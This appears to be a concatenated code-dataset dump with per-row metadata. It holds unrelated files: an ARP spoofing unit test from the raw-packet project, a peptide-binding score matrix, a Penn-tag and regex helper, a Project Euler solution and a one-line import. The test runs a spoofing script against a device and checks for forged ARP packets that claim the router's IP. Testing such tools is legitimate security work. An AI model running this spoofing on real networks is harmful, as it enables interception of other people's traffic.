print(Num, type(Num)) | 15 | 21 | 0.633333 | 12 | 60 | 3.166667 | 0.416667 | 0.421053 | 0.631579 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 0.15 | 60 | 4 | 22 | 15 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
68a010e9103b38ea63b73bace8837d878b86dc77 | 8,111 | py | Python | raw_packet/Tests/Unit_tests/Scripts/ARP/test_arp_spoof.py | 4ekin/raw-packet | 40322ec2f6c3ce0647ba69283df40fa8da4817e2 | [
"MIT"
] | null | null | null | raw_packet/Tests/Unit_tests/Scripts/ARP/test_arp_spoof.py | 4ekin/raw-packet | 40322ec2f6c3ce0647ba69283df40fa8da4817e2 | [
"MIT"
] | null | null | null | raw_packet/Tests/Unit_tests/Scripts/ARP/test_arp_spoof.py | 4ekin/raw-packet | 40322ec2f6c3ce0647ba69283df40fa8da4817e2 | [
"MIT"
] | null | null | null | # region Description
"""
test_arp_spoof.py: Unit tests for Raw-packet script: arp_spoof.py
Author: Vladimir Ivanov
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from sys import path
from os.path import dirname, abspath, isfile
from os import remove, kill
from signal import SIGTERM
from time import sleep
from subprocess import run, PIPE, Popen
from scapy.all import rdpcap, ARP
from typing import IO
import unittest
# endregion
# region Authorship information
__author__ = 'Vladimir Ivanov'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = 'Vladimir Ivanov'
__email__ = 'ivanov.vladimir.mail@gmail.com'
__status__ = 'Development'
# endregion
# region Main class - ScriptArpScanTest
class ScriptArpSpoofTest(unittest.TestCase):
# region Properties
root_path = dirname(dirname(dirname(dirname(dirname(dirname(abspath(__file__)))))))
path.append(root_path)
from raw_packet.Utils.base import Base
from raw_packet.Tests.Unit_tests.variables import Variables
base: Base = Base()
tshark_pcap_filename: str = '/tmp/arp_spoof_test.pcap'
# endregion
def test01_main_responses(self):
find_spoof_packet: bool = False
arp_spoof_command: str = 'python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' + \
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' + \
ScriptArpSpoofTest.Variables.apple_device_ipv4_address
Popen(arp_spoof_command, shell=True)
tshark_command: str = 'tshark -i ' + ScriptArpSpoofTest.Variables.test_network_interface + \
' -f "ether src ' + ScriptArpSpoofTest.Variables.your_mac_address + \
' and ether dst ' + ScriptArpSpoofTest.Variables.apple_device_mac_address + \
' and arp" -B 65535 -w ' + self.tshark_pcap_filename + \
' 1>/dev/null 2>&1'
Popen(tshark_command, shell=True)
sleep(5)
while self.base.get_process_pid('/arp_spoof.py') != -1:
kill(self.base.get_process_pid('/arp_spoof.py'), SIGTERM)
sleep(0.5)
while self.base.get_process_pid('tshark') != -1:
kill(self.base.get_process_pid('tshark'), SIGTERM)
sleep(0.5)
try:
packets = rdpcap(self.tshark_pcap_filename)
for packet in packets:
if packet.haslayer(ARP):
arp_packet = packet[ARP]
self.base.print_info('ARP opcode: ', str(arp_packet.op))
self.base.print_info('ARP sender MAC: ', arp_packet.hwsrc)
self.base.print_info('ARP target MAC: ', arp_packet.hwdst)
self.base.print_info('ARP sender IP: ', arp_packet.psrc)
self.base.print_info('ARP target IP: ', arp_packet.pdst)
if arp_packet.hwsrc == ScriptArpSpoofTest.Variables.your_mac_address and \
arp_packet.hwdst == ScriptArpSpoofTest.Variables.apple_device_mac_address and \
arp_packet.psrc == ScriptArpSpoofTest.Variables.router_ipv4_address and \
arp_packet.pdst == ScriptArpSpoofTest.Variables.apple_device_ipv4_address and \
arp_packet.op == 2:
find_spoof_packet = True
break
except ValueError:
pass
if isfile(self.tshark_pcap_filename):
remove(self.tshark_pcap_filename)
self.assertTrue(find_spoof_packet)
def test02_main_requests(self):
find_spoof_packet: bool = False
arp_spoof_command: str = 'python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' + \
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' + \
ScriptArpSpoofTest.Variables.apple_device_ipv4_address + ' -r'
Popen(arp_spoof_command, shell=True)
tshark_command: str = 'tshark -i ' + ScriptArpSpoofTest.Variables.test_network_interface + \
' -f "ether src ' + ScriptArpSpoofTest.Variables.your_mac_address + \
' and ether dst ' + ScriptArpSpoofTest.Variables.apple_device_mac_address + \
' and arp" -B 65535 -w ' + self.tshark_pcap_filename + \
' 1>/dev/null 2>&1'
Popen(tshark_command, shell=True)
sleep(5)
while self.base.get_process_pid('/arp_spoof.py') != -1:
kill(self.base.get_process_pid('/arp_spoof.py'), SIGTERM)
sleep(0.5)
while self.base.get_process_pid('tshark') != -1:
kill(self.base.get_process_pid('tshark'), SIGTERM)
sleep(0.5)
try:
packets = rdpcap(self.tshark_pcap_filename)
for packet in packets:
if packet.haslayer(ARP):
arp_packet = packet[ARP]
self.base.print_info('ARP opcode: ', str(arp_packet.op))
self.base.print_info('ARP sender MAC: ', arp_packet.hwsrc)
self.base.print_info('ARP target MAC: ', arp_packet.hwdst)
self.base.print_info('ARP sender IP: ', arp_packet.psrc)
self.base.print_info('ARP target IP: ', arp_packet.pdst)
if arp_packet.hwsrc == ScriptArpSpoofTest.Variables.your_mac_address and \
arp_packet.hwdst == '00:00:00:00:00:00' and \
arp_packet.psrc == ScriptArpSpoofTest.Variables.router_ipv4_address and \
arp_packet.op == 1:
find_spoof_packet = True
break
except ValueError:
pass
if isfile(self.tshark_pcap_filename):
remove(self.tshark_pcap_filename)
self.assertTrue(find_spoof_packet)
def test03_main_bad_interface(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.bad_network_interface], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_network_interface, arp_spoof_output)
def test04_main_bad_gateway_ip(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.test_network_interface + ' -g ' +
ScriptArpSpoofTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_ipv4_address, arp_spoof_output)
def test05_main_bad_target_ip(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' +
ScriptArpSpoofTest.Variables.bad_ipv4_address], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_ipv4_address, arp_spoof_output)
def test06_main_bad_target_mac(self):
arp_spoof = run(['python3 ' + self.root_path + '/Scripts/ARP/arp_spoof.py -i ' +
ScriptArpSpoofTest.Variables.test_network_interface + ' -t ' +
ScriptArpSpoofTest.Variables.apple_device_ipv4_address + ' -m ' +
ScriptArpSpoofTest.Variables.bad_mac_address], shell=True, stdout=PIPE)
arp_spoof_output: str = arp_spoof.stdout.decode('utf-8')
print(arp_spoof_output)
self.assertIn(ScriptArpSpoofTest.Variables.bad_mac_address, arp_spoof_output)
# endregion
| 50.067901 | 107 | 0.617433 | 919 | 8,111 | 5.161045 | 0.166485 | 0.062408 | 0.0253 | 0.035842 | 0.801813 | 0.761754 | 0.74805 | 0.74805 | 0.73793 | 0.73793 | 0 | 0.015044 | 0.287018 | 8,111 | 161 | 108 | 50.378882 | 0.805118 | 0.03785 | 0 | 0.676692 | 0 | 0 | 0.103377 | 0.026198 | 0 | 0 | 0 | 0 | 0.045113 | 1 | 0.045113 | false | 0.015038 | 0.082707 | 0 | 0.157895 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc1efc92565700f28a1e214f9336fcbf363f2ca3 | 2,259 | py | Python | epytope/Data/pssms/smm/mat/B_42_01_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smm/mat/B_42_01_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smm/mat/B_42_01_9.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | B_42_01_9 = {0: {'A': 0.055, 'C': 0.0, 'E': -0.236, 'D': 0.334, 'G': 0.124, 'F': -0.444, 'I': 0.01, 'H': 0.243, 'K': 0.016, 'M': 0.0, 'L': -0.297, 'N': -0.122, 'Q': -0.004, 'P': 0.065, 'S': 0.158, 'R': 0.092, 'T': 0.185, 'W': 0.181, 'V': -0.162, 'Y': -0.198}, 1: {'A': 0.306, 'C': 0.0, 'E': 0.632, 'D': 0.05, 'G': 0.139, 'F': -0.603, 'I': -0.341, 'H': 0.125, 'K': 0.011, 'M': 0.0, 'L': 0.289, 'N': 0.0, 'Q': 0.357, 'P': -1.512, 'S': 0.402, 'R': 0.303, 'T': 0.058, 'W': 0.0, 'V': -0.031, 'Y': -0.186}, 2: {'A': 0.037, 'C': 0.0, 'E': 0.181, 'D': 0.094, 'G': 0.227, 'F': -0.015, 'I': 0.073, 'H': 0.054, 'K': -0.058, 'M': -0.29, 'L': 0.156, 'N': 0.043, 'Q': 0.041, 'P': -0.027, 'S': -0.116, 'R': -0.305, 'T': -0.039, 'W': -0.0, 'V': -0.042, 'Y': -0.014}, 3: {'A': 0.0, 'C': -0.045, 'E': 0.073, 'D': -0.094, 'G': 0.238, 'F': -0.078, 'I': -0.084, 'H': -0.018, 'K': 0.14, 'M': 0.0, 'L': 0.152, 'N': 0.04, 'Q': 0.075, 'P': 0.013, 'S': -0.037, 'R': -0.116, 'T': -0.192, 'W': -0.065, 'V': -0.104, 'Y': 0.102}, 4: {'A': -0.16, 'C': -0.017, 'E': 0.404, 'D': 0.253, 'G': 0.092, 'F': 0.089, 'I': -0.081, 'H': 0.0, 'K': 0.322, 'M': -0.331, 'L': -0.526, 'N': 0.356, 'Q': 0.26, 'P': -0.171, 'S': -0.295, 'R': 0.017, 'T': 0.148, 'W': -0.244, 'V': -0.17, 'Y': 0.054}, 5: {'A': -0.057, 'C': 0.0, 'E': 0.466, 'D': 0.323, 'G': 0.053, 'F': 0.164, 'I': 0.185, 'H': -0.201, 'K': -0.357, 'M': -0.027, 'L': 0.048, 'N': -0.024, 'Q': -0.073, 'P': -0.024, 'S': 0.118, 'R': -0.479, 'T': 0.153, 'W': 0.0, 'V': -0.349, 'Y': 0.082}, 6: {'A': -0.109, 'C': 0.103, 'E': -0.025, 'D': 0.477, 'G': -0.065, 'F': -0.301, 'I': -0.083, 'H': -0.065, 'K': -0.15, 'M': -0.113, 'L': 0.013, 'N': -0.003, 'Q': 0.282, 'P': -0.185, 'S': 0.136, 'R': -0.315, 'T': 0.267, 'W': 0.134, 'V': -0.104, 'Y': 0.107}, 7: {'A': -0.393, 'C': 0.009, 'E': -0.147, 'D': 0.107, 'G': -0.136, 'F': 0.0, 'I': -0.269, 'H': 0.104, 'K': 0.229, 'M': 0.238, 'L': 0.19, 'N': 0.196, 'Q': -0.087, 'P': -0.264, 'S': -0.253, 'R': 0.101, 'T': 0.304, 'W': -0.248, 'V': 0.381, 'Y': -0.062}, 8: {'A': -0.47, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.464, 'I': -0.404, 'H': 0.0, 'K': 1.278, 'M': -1.578, 'L': -0.605, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 1.152, 'T': -0.166, 'W': 0.341, 'V': -0.21, 'Y': 1.126}, -1: {'con': 3.85875}} | 2,259 | 2,259 | 0.385126 | 557 | 2,259 | 1.556553 | 0.292639 | 0.053057 | 0.017301 | 0.023068 | 0.107266 | 0 | 0 | 0 | 0 | 0 | 0 | 0.362142 | 0.165117 | 2,259 | 1 | 2,259 | 2,259 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0.080973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc21d22a0df477b9364223be687fc78b0c687565 | 6,794 | py | Python | install/freqdb/common.py | mzimandl/wag | f9309bb50d21731304354d69f2d9347dcdcbe7a8 | [
"Apache-2.0"
] | 3 | 2020-06-01T08:59:25.000Z | 2020-08-28T07:08:52.000Z | install/freqdb/common.py | czcorpus/wdglance | 817607b29136394a4641cf1abc303db66cff6500 | [
"Apache-2.0"
] | 129 | 2019-02-05T08:04:33.000Z | 2020-05-11T14:24:23.000Z | install/freqdb/common.py | czcorpus/wdglance | 817607b29136394a4641cf1abc303db66cff6500 | [
"Apache-2.0"
] | 2 | 2019-09-13T14:52:24.000Z | 2019-10-03T08:17:07.000Z | import re
upcase_regex = re.compile(u"^[A-Z\u00C0-\u00D6\u00D8-\u00DE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2160-\u216F\u2183\u24B6-\u24CF\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AE\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A\U00010400-\U00010427\U000104B0-\U000104D3\U00010C80-\U00010CB2\U000118A0-\U000118BF\U0001D400-\U0001D419\U0001D434-\U0001D44D\U0001D468-\U0001D481\U0001D49C\U0001D49E\U0001D49F\U0001D4A2\U0001D4A5\U0001D4A6\U0001D4A9-\U0001D4AC\U0001D4AE-\U0001D4B5\U0001D4D0-\U0001D4E9\U0001D504\U0001D505\U0001D507-\U0001D50A\U0001D50D-\U0001D514\U0001D516-\U0001D51C\U0001D538\U0001D539\U0001D53B-\U0001D53E\U0001D540-\U0001D544\U0001D546\U0001D54A-\U0001D550\U0001D56C-\U0001D585\U0001D5A0-\U0001D5B9\U0001D5D4-\U0001D5ED\U0001D608-\U0001D621\U0001D63C-\U0001D655\U0001D670-\U0001D689\U0001D6A8-\U0001D6C0\U0001D6E2-\U0001D6FA\U0001D71C-\U0001D734\U0001D756-\U0001D76E\U0001D790-\U0001D7A8\U0001D7CA\U0001E900-\U0001E921\U0001F130-\U0001F149\U0001F150-\U0001F169\U0001F170-\U0001F189].+")
def is_tag(t):
return re.match(r'[a-zA-Z$]', 'J$')
def pos2pos(s): return s[0]
def penn2pos(s):
try:
return {
'CC': 'J', # Coordinating conjunction
'CD': 'C', # Cardinal number
'DT': 'X', # Determiner
'EX': 'X', # Existential there
'FW': 'X', # Foreign word
'IN': 'R', # Preposition or subordinating conjunction
'JJ': 'A', # Adjective
'JJR': 'A', # Adjective, comparative
'JJS': 'A', # Adjective, superlative
'LS': 'X', # List item marker
'MD': 'X', # Modal
'NN': 'N', # Noun, singular or mass
'NNS': 'N', # Noun, plural
'NNP': 'X', # Proper noun, singular
'NNPS': 'X', # Proper noun, plural
'PDT': 'X', # Predeterminer
'POS': 'X', # Possessive ending
'PRP': 'P', # Personal pronoun
'PRP$': 'P', # Possessive pronoun
'RB': 'D', # Adverb
'RBR': 'D', # Adverb, comparative
'RBS': 'D', # Adverb, superlative
'RP': 'T', # Particle
'SYM': 'X', # Symbol
'TO': 'X', # to
'UH': 'I', # Interjection
'VB': 'V', # Verb, base form
'VBD': 'V', # Verb, past tense
'VBG': 'V', # Verb, gerund or present participle
'VBN': 'V', # Verb, past participle
'VBP': 'V', # Verb, non-3rd person singular present
'VBZ': 'V', # Verb, 3rd person singular present
'WDT': 'V', # Wh-determiner
'WP': 'P', # Wh-pronoun
'WP$': 'P', # Possessive wh-pronoun
'WRB': 'D' # Wh-adverb
}[s]
except KeyError:
#print('Unrecognized tag {0}'.format(s))
return 'X'
def is_stop_word(w):
return w is None or re.match(r'^[\d\.,\:;\!\?%\$\[\]=\*\-\+\(\)\{\}/\|"\'_<>"&#@~\^§]+$', w)
def is_stop_ngram(w):
items = w.split(' ')
return any([is_stop_word(x) for x in items])
| 111.377049 | 4,744 | 0.712688 | 956 | 6,794 | 5.056485 | 0.883891 | 0.006206 | 0.00331 | 0.00993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.378021 | 0.110686 | 6,794 | 60 | 4,745 | 113.233333 | 0.42188 | 0.103915 | 0 | 0 | 0 | 0.019231 | 0.809721 | 0.78608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096154 | false | 0 | 0.019231 | 0.057692 | 0.211538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0bdbc35a6b7c1a54cfcff26d6405a80bcf772b9f | 3,820 | py | Python | problem8.py | Yusufpek/project-euler-with-python-csharp-tr | 16bd0730e71882738a981b14a465172262e369f0 | [
"CC0-1.0"
] | 2 | 2021-05-01T01:13:41.000Z | 2021-06-28T18:21:17.000Z | problem8.py | Yusufpek/project-euler-with-python-csharp-tr | 16bd0730e71882738a981b14a465172262e369f0 | [
"CC0-1.0"
] | null | null | null | problem8.py | Yusufpek/project-euler-with-python-csharp-tr | 16bd0730e71882738a981b14a465172262e369f0 | [
"CC0-1.0"
] | 2 | 2021-03-12T21:44:35.000Z | 2021-06-18T06:27:23.000Z | """
Project Euler Problem 8
EN:The four adjacent digits in the 1000-digit number that have the greatest product are 9 × 9 × 8 × 9 = 5832.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
Find the thirteen adjacent digits in the 1000-digit number that have the greatest product. What is the value of this product?
TUR: 1000 basamaklı sayının içinde çarpımı en yüksek olan 4 komşu sayının çarpımı 9x9x8x9 = 5832.
Bu sayının içinde çarpımı en büyük olan komşu 13 sayının çarpımını bulun. Bu sayının değeri nedir?
"""
# Sayıyı kopyaladım lakin şu an bu sayıda alt satır kaçış karakterleri var
number ="""73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450"""
# Sayıdaki karakterleri temizledim
number = number.replace("\n","")
# Sayıları 13'lü paketlere ayıracağız ve bu listeye koyacağız
digits_13_packs = []
# başlangıç ve bitiş bir bir kayacak ve biz de paketleyeceğiz
for start,end in zip(range(0,len(number)-13),range(13,len(number))):
digits_13_packs.append(number[start:end])
# Bu listeye bu sayıları tek tek ayırıp stringden integere çevirdiklerimizi ekleyeceğiz
# "321" yerine [3,2,1] şeklinde
digits_13_int = [list(pack) for pack in digits_13_packs]
# integere dönüştürüyoruz
for pack_index,pack in enumerate(digits_13_int):
for digit_index,digit in enumerate(pack):
digits_13_int[pack_index][digit_index] = int(digit)
# paketlerin içindeki sayıların çarpımını bu listeye ekleyeceğiz
product_list = []
# her paketi tek tek dönüyoruz
for pack in digits_13_int:
result = 1
# her paketteki rakamı tek tek dönüyoruz
for digit in pack:
# rakamları çarpıp listeye ekliyoruz
result = result * digit
product_list.append(result)
# en büyük değeri ekrana yazdırıyoruz
print(max(product_list))
| 39.791667 | 126 | 0.850524 | 291 | 3,820 | 11.103093 | 0.47079 | 0.017332 | 0.013618 | 0.011761 | 0.666667 | 0.656144 | 0.656144 | 0.656144 | 0.656144 | 0.656144 | 0 | 0.612002 | 0.118848 | 3,820 | 96 | 127 | 39.791667 | 0.346999 | 0.536649 | 0 | 0 | 0 | 0 | 0.616174 | 0.6035 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.028571 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0bde8e55cd7e619f9b899b1d177cd79ffbc9ca47 | 38 | py | Python | django_grpc_bus/__init__.py | rameezarshad/django-grpc-framework | 6f9cea9828343b23c60656b561bca5d750fe6b5f | [
"Apache-2.0"
] | 2 | 2020-12-19T18:56:49.000Z | 2022-01-13T07:01:37.000Z | django_grpc_bus/__init__.py | rameezarshad/django-grpc-framework | 6f9cea9828343b23c60656b561bca5d750fe6b5f | [
"Apache-2.0"
] | null | null | null | django_grpc_bus/__init__.py | rameezarshad/django-grpc-framework | 6f9cea9828343b23c60656b561bca5d750fe6b5f | [
"Apache-2.0"
] | null | null | null | from .client.registry import registry
